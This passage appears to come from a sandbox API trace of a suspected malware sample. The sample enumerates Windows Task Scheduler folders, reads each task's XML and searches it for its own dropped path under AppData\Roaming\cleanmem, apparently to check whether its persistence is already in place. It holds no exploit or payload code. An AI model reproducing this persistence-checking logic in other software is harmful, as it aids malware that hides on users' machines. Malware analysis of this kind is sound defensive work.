pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n PT0S\r\n true\r\n false\r\n \r\n") returned 0x0 [0138.806] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n PT0S\r\n true\r\n false\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.807] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.807] IUnknown:Release (This=0x127010) returned 0x0 [0138.807] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x127010) returned 0x0 [0138.808] ITaskFolderCollection:get_Count (in: This=0x127010, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.808] IUnknown:Release (This=0x127010) returned 0x0 [0138.808] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.808] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.808] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x127020) returned 0x0 [0138.812] IRegisteredTaskCollection:get_Count (in: This=0x127020, pCount=0x24dbd0 | out: pCount=0x24dbd0*=3) returned 0x0 [0138.812] IRegisteredTaskCollection:get_Item (in: This=0x127020, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127120) returned 0x0 [0138.812] IRegisteredTask:get_Name (in: This=0x127120, pName=0x24da80 | out: pName=0x24da80*="Consolidator") returned 0x0 [0138.812] IRegisteredTask:get_Xml (in: This=0x127120, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n Microsoft Corporation\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n 1.0\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT19H\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n") returned 0x0 [0138.815] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n Microsoft Corporation\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n 1.0\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT19H\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.815] IUnknown:Release (This=0x127120) returned 0x0 [0138.815] IRegisteredTaskCollection:get_Item (in: This=0x127020, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127120) returned 0x0 [0138.815] IRegisteredTask:get_Name (in: This=0x127120, pName=0x24da80 | out: pName=0x24da80*="KernelCeipTask") returned 0x0 [0138.815] IRegisteredTask:get_Xml (in: This=0x127120, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)\r\n \r\n \r\n \r\n 2008-09-01T03:30:00\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n PT3M\r\n PT17H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n \r\n {e7ed314f-2816-4c26-aeb5-54a34d02404c}\r\n \r\n \r\n") returned 0x0 [0138.819] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)\r\n \r\n \r\n \r\n 2008-09-01T03:30:00\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n PT3M\r\n PT17H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n \r\n {e7ed314f-2816-4c26-aeb5-54a34d02404c}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.819] IUnknown:Release (This=0x127120) returned 0x0 [0138.820] IRegisteredTaskCollection:get_Item (in: This=0x127020, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127120) returned 0x0 [0138.820] IRegisteredTask:get_Name (in: This=0x127120, pName=0x24da80 | out: pName=0x24da80*="UsbCeip") returned 0x0 [0138.820] IRegisteredTask:get_Xml (in: This=0x127120, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)\r\n 1.0\r\n \r\n \r\n \r\n 2008-04-25T01:30:00\r\n true\r\n \r\n 3\r\n \r\n \r\n \r\n \r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\r\n \r\n \r\n \r\n") returned 0x0 [0138.823] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)\r\n 1.0\r\n \r\n \r\n \r\n 2008-04-25T01:30:00\r\n true\r\n \r\n 3\r\n \r\n \r\n \r\n \r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.823] IUnknown:Release (This=0x127120) returned 0x0 [0138.823] IUnknown:Release (This=0x127020) returned 0x0 [0138.823] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x127020) returned 0x0 [0138.848] ITaskFolderCollection:get_Count (in: This=0x127020, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.848] IUnknown:Release (This=0x127020) returned 0x0 [0138.848] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.848] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.848] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fe0) returned 0x0 [0138.851] IRegisteredTaskCollection:get_Count (in: This=0x126fe0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.851] IRegisteredTaskCollection:get_Item (in: This=0x126fe0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127130) returned 0x0 [0138.851] IRegisteredTask:get_Name (in: This=0x127130, pName=0x24da80 | out: pName=0x24da80*="ScheduledDefrag") returned 0x0 [0138.851] IRegisteredTask:get_Xml (in: This=0x127130, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n 2017-09-27T01:00:00\r\n false\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n P7D\r\n true\r\n true\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c\r\n \r\n \r\n") returned 0x0 [0138.854] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n 2017-09-27T01:00:00\r\n false\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n P7D\r\n true\r\n true\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.855] IUnknown:Release (This=0x127130) returned 0x0 [0138.855] IUnknown:Release (This=0x126fe0) returned 0x0 [0138.855] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fe0) returned 0x0 [0138.856] ITaskFolderCollection:get_Count (in: This=0x126fe0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.856] IUnknown:Release (This=0x126fe0) returned 0x0 [0138.856] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.856] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.856] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126ff0) returned 0x0 [0138.858] IRegisteredTaskCollection:get_Count (in: This=0x126ff0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.858] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.858] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="Scheduled") returned 0x0 [0138.858] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n 1.0\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT8H\r\n false\r\n false\r\n \r\n StopExisting\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {c1f85ef8-bcc2-4606-bb39-70c523715eb3}\r\n \r\n \r\n") returned 0x0 [0138.861] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n 1.0\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT8H\r\n false\r\n false\r\n \r\n StopExisting\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {c1f85ef8-bcc2-4606-bb39-70c523715eb3}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.861] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.861] IUnknown:Release (This=0x126ff0) returned 0x0 [0138.861] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126ff0) returned 0x0 [0138.862] ITaskFolderCollection:get_Count (in: This=0x126ff0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.862] IUnknown:Release (This=0x126ff0) returned 0x0 [0138.862] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.862] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.862] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126ff0) returned 0x0 [0138.865] IRegisteredTaskCollection:get_Count (in: This=0x126ff0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0138.865] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.865] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="Microsoft-Windows-DiskDiagnosticDataCollector") returned 0x0 [0138.865] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \r\n \r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n false\r\n \r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n \r\n \r\n \r\n \r\n 2\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n") returned 0x0 [0138.867] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \r\n \r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n false\r\n \r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n \r\n \r\n \r\n \r\n 2\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.868] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.868] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.868] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="Microsoft-Windows-DiskDiagnosticResolver") returned 0x0 [0138.868] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \r\n \r\n true\r\n false\r\n Parallel\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n") returned 0x0 [0138.870] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \r\n \r\n true\r\n false\r\n Parallel\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.870] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.870] IUnknown:Release (This=0x126ff0) returned 0x0 [0138.870] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126ff0) returned 0x0 [0138.871] ITaskFolderCollection:get_Count (in: This=0x126ff0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.871] IUnknown:Release (This=0x126ff0) returned 0x0 [0138.871] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.871] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.871] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fe0) returned 0x0 [0138.873] IRegisteredTaskCollection:get_Count (in: This=0x126fe0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.873] IRegisteredTaskCollection:get_Item (in: This=0x126fe0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127130) returned 0x0 [0138.873] IRegisteredTask:get_Name (in: This=0x127130, pName=0x24da80 | out: pName=0x24da80*="Notifications") returned 0x0 [0138.873] IRegisteredTask:get_Xml (in: This=0x127130, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemRoot%\\system32\\LocationNotifications.exe,-102)\r\n Microsoft\\Windows\\Location\\Notifications\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n 1.3\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='LocationNotifications'] and EventID=1]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotifications.exe\r\n \r\n \r\n") returned 0x0 [0138.875] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\system32\\LocationNotifications.exe,-102)\r\n Microsoft\\Windows\\Location\\Notifications\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n 1.3\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='LocationNotifications'] and EventID=1]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotifications.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.876] IUnknown:Release (This=0x127130) returned 0x0 [0138.876] IUnknown:Release (This=0x126fe0) returned 0x0 [0138.876] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fe0) returned 0x0 [0138.877] ITaskFolderCollection:get_Count (in: This=0x126fe0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.877] IUnknown:Release (This=0x126fe0) returned 0x0 [0138.877] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.877] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.877] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126ff0) returned 0x0 [0138.879] IRegisteredTaskCollection:get_Count (in: This=0x126ff0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.879] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.879] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="WinSAT") returned 0x0 [0138.879] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n 2008-02-25T19:15:00\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n 2008-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n {A9A33436-678B-4C9C-A211-7CC38785E79D}\r\n \r\n \r\n") returned 0x0 [0138.881] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n 2008-02-25T19:15:00\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n 2008-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n 